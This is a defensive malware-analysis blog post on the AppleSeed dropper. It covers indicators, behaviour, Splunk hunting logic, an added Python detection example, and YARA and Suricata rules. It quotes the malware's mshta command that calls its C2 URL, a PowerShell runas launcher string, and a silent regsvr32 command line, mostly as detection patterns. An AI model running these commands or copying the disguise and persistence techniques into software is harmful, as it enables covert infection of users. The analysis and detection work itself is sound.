Overview of AppleSeed Dropper

This blog post briefly covers some additional details of the AppleSeed backdoor originally covered by AhnLab's ASEC team.

As the ASEC team did a great job detailing the initial access methods in this recent attack, we will skip ahead and dive right into the characteristics and analysis of the malware itself.

Malware Analysis

MD5: 851e33373114fef45d0fe28c6934fa73

SHA256: e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f

File name: firmware upgrade installer.exe

File type: Win PE

Size: 408 KB

As the file name suggests, the executable is disguised as a router firmware upgrade program. It shows a pop-up window to confirm the start of the supposed upgrade and opens iptime.com in the victim's web browser (Figure 1).

Figure 1: iptime.com site opened in the browser by EXE

While the victim may be under the assumption that an upgrade is in progress, the backdoor is installing itself and creating multiple files in the background.

Of note, the backdoor deleted files as soon as their purpose was served, so unfortunately some files could not be retrieved. Digging into our Sysmon logs, we can see the following file created in AppData\Roaming\Media:

Figure 2: Creation of file “wmi-ui-2ff199e9.db”

Following the creation of the .db file, regsvr32 is used with the "/s" argument so that it runs silently and does not display any message boxes.

Figure 3: regsvr32 executing .db file

The dropper then uses mshta to connect to leomin.dothome.co[.]kr/update/?mode=login. In previous writeups on the AppleSeed backdoor, calls to mshta.exe were used for additional malicious behavior.

At the time of writing, the request only returned an HTTP 200 with no follow-on observable behavior.

Figure 4: mshta connecting to suspicious domain

A handful of randomly named BAT files are created in the %TEMP% directory and run via cmd.exe. Each file deletes itself after running, so further analysis of the files was not possible.

Figure 5: randomly named BAT file

* In addition to the BAT file above, additional .bat files named "2A75" and "3D24" were also created and executed.

Persistence

SHA256: e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea

Upon the execution and deletion of the final BAT file, persistence is achieved via a DLL named AutoUpdate, set as a Registry run key at:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Figure 6: Registry run key for persistence

The above DLL is created at C:\ProgramData\Firmware\Microsoft\Windows\Defender\.

The DLL is packed with the open-source UPX packer, or a similar packer, as the PEiD output suggests.

Figure 7: PEiD output of autoupdate.dll

Detection Opportunities

Although Kimsuky goes to considerable lengths to cover their tracks (self-deleting BAT files) and obfuscate the backdoor, not all is lost.

Below, I will list a few Splunk queries that would help us hunt for this activity even if we had no prior knowledge of the malware's tactics.

1. Detect Mshta URL

Probably our easiest opportunity is to look for mshta with a URL in the command line. Depending on how prevalent mshta is in your environment, your results may vary.

Figure 8: Splunk query for mshta (click for full image)

2. File Creation in Suspicious Path

There likely aren't many programs in your environment creating executable files in paths like \AppData\Local, so it is useful to have a quick query that shows us when this occurs.

* Inspiration for the below query: https://research.splunk.com/endpoint/executables_or_script_creation_in_suspicious_path/

Figure 9: Splunk query for file creation in suspicious path

3. Detect regsvr32.exe with “silent” switch

This last query identifies instances where the silent switch is used in conjunction with regsvr32.exe. We'll harden the query by looking for the switch written with a forward slash as well as with a hyphen.

In addition, we will also look for the odd file paths mentioned above, though this may need tweaking. One weak point of this query is that it does not currently account for regsvr32 being renamed.

Figure 10: Splunk query for regsvr32.exe with "/s" or "-s"
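The three hunting ideas above, implemented over constructed Sysmon-style events as an added example (this is not the post's own Splunk logic). The field names follow Sysmon Event ID 1 and 11 (CommandLine, OriginalFileName, TargetFilename), the sample events are made up, and the regsvr32 check keys on OriginalFileName rather than the image name to cover the renamed-binary gap noted above.

```python
import re

# Constructed Sysmon-style events (ID 1 = process create, ID 11 = file create), modelled on
# the behaviour described in this post; these are made-up records, not real telemetry.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta.exe http://leomin.dothome.co.kr/update/?mode=login"},
    {"EventID": 11, "Image": r"C:\Users\victim\Desktop\firmware upgrade installer.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Media\wmi-ui-2ff199e9.db"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r'regsvr32.exe /s "C:\Users\victim\AppData\Roaming\Media\wmi-ui-2ff199e9.db"'},
    # Renamed copy of regsvr32: Image no longer says regsvr32, but OriginalFileName still does.
    {"EventID": 1, "Image": r"C:\Users\victim\AppData\Local\Temp\svc.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r'svc.exe -s "C:\Users\victim\AppData\Roaming\Media\x.db"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe report.txt"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# User-writable locations this dropper used (AppData\Roaming\Media, ProgramData\Firmware\...)
SUSPICIOUS_PATH_RE = re.compile(r"\\AppData\\(Local|Roaming)\\|\\ProgramData\\", re.IGNORECASE)
# .db is included because the dropper wrote its DLL with that extension before regsvr32 loaded it
EXEC_EXT_RE = re.compile(r"\.(exe|dll|db|bat|cmd|ps1|vbs|hta|js)$", re.IGNORECASE)
# Silent switch as a standalone token, written with either a slash or a hyphen
SILENT_SWITCH_RE = re.compile(r"(^|\s)[/-]s(\s|$)", re.IGNORECASE)

def detect_mshta_url(ev):
    """1. mshta launched with a URL on its command line."""
    return (ev["EventID"] == 1 and ev.get("OriginalFileName", "").upper() == "MSHTA.EXE"
            and URL_RE.search(ev.get("CommandLine", "")) is not None)

def detect_suspicious_file_create(ev):
    """2. Executable or script written under a user-writable path."""
    target = ev.get("TargetFilename", "")
    return (ev["EventID"] == 11 and SUSPICIOUS_PATH_RE.search(target) is not None
            and EXEC_EXT_RE.search(target) is not None)

def detect_silent_regsvr32(ev):
    """3. regsvr32 with /s or -s. Keying on OriginalFileName (taken from the PE version
    resource) instead of the image name covers the renamed-binary gap noted above."""
    return (ev["EventID"] == 1 and ev.get("OriginalFileName", "").upper() == "REGSVR32.EXE"
            and SILENT_SWITCH_RE.search(ev.get("CommandLine", "")) is not None)

RULES = [("mshta_url", detect_mshta_url), ("suspicious_file_create", detect_suspicious_file_create),
         ("regsvr32_silent", detect_silent_regsvr32)]

def hunt(events):
    """Return (rule_name, evidence) for every event a rule fires on."""
    return [(name, ev.get("CommandLine") or ev.get("TargetFilename"))
            for ev in events for name, rule in RULES if rule(ev)]
```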

Yara Rules

Disclaimer: I am by no means an expert; as a matter of fact, I am still looking to get my foot in the door in cybersecurity. Please only utilize the rules below for hunting purposes, not in production.

Dropper

rule NK_APT_AppleSeed_Dropper {
    meta:
        description = " - file firmware upgrade installer.exe"
        author = "Michael Rippey"
        reference = "https://asec.ahnlab.com/ko/34883/"
        date = "2022-06-01"
        hash = "e0ea745b9d6fe7c222a0ee4962905f9cea3754e7b587274ec7ccef59b3825d9f"
    strings:
        // UAC-prompting PowerShell launcher format string
        $a = "powershell.exe start-process \"%s\" -argumentlist '%s' -verb runas" fullword wide
        // mshta callout observed in this sample
        $b1 = "mshta.exe http://leomin.dothome.co.kr/update/?mode=login" fullword ascii
        $b2 = "USER32.dll" fullword ascii
        $b3 = "KERNEL32.dll" fullword ascii
        $b4 = "kernel32.dll" fullword wide
        $b5 = "mscoree.dll" fullword wide
        $b6 = "https://iptime.com" fullword wide
        $b7 = "broken pipe" fullword ascii
        $b8 = "executable format error" fullword ascii
        $b9 = "host unreachable" fullword ascii
        $b10 = "connection already in progress" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 1000KB and
        1 of ($a*) and 4 of them
}

AppleSeed DLL

rule NK_APT_AppleSeed_Backdoor {
    meta:
        description = " - file AutoUpdate.dll"
        author = "Michael Rippey"
        reference = "https://asec.ahnlab.com/ko/34883/"
        date = "2022-06-01"
        hash = "e240465ca0c31373dc7f1af2bfc08bda45a45aaf4466c6a15d3f16f1182147ea"
    strings:
        $a1 = "ADVAPI32.dll" fullword ascii
        $a2 = "KERNEL32.DLL" fullword ascii
        $a3 = "freed.dll" fullword ascii
        $a4 = "outlook" fullword wide
        $a5 = "CryptEncrypt" fullword ascii
        $a6 = "amily not supporte" fullword ascii
        $a7 = "connecyar" fullword ascii
        $a8 = "rerictaj" fullword ascii
        $a9 = "lrgeabik" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 400KB and
        5 of them
}

Suricata Rules

alert http any any -> any any (msg:"NK APT AppleSeed -IOC- domain network connection"; flow:established,to_server; content:"GET"; http_method; content:"leomin.dothome.co.kr"; http_host; content:"/update"; http_uri; content:"?mode=login"; http_uri; nocase; fast_pattern; urilen:19; reference:url,asec.ahnlab.com/ko/34883/; classtype:trojan-activity; sid:20220601; rev:1; metadata:author Michael_Rippey, created_at 2022_06_01;)

MITRE ATT&CK Techniques

ID      Technique

T1027   Obfuscated Files or Information

T1129   Shared Modules

T1547   Persistence, Privilege Escalation

T1566   Phishing

Links/Further Reading

https://asec.ahnlab.com/ko/34883/

https://blog.malwarebytes.com/threat-intelligence/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf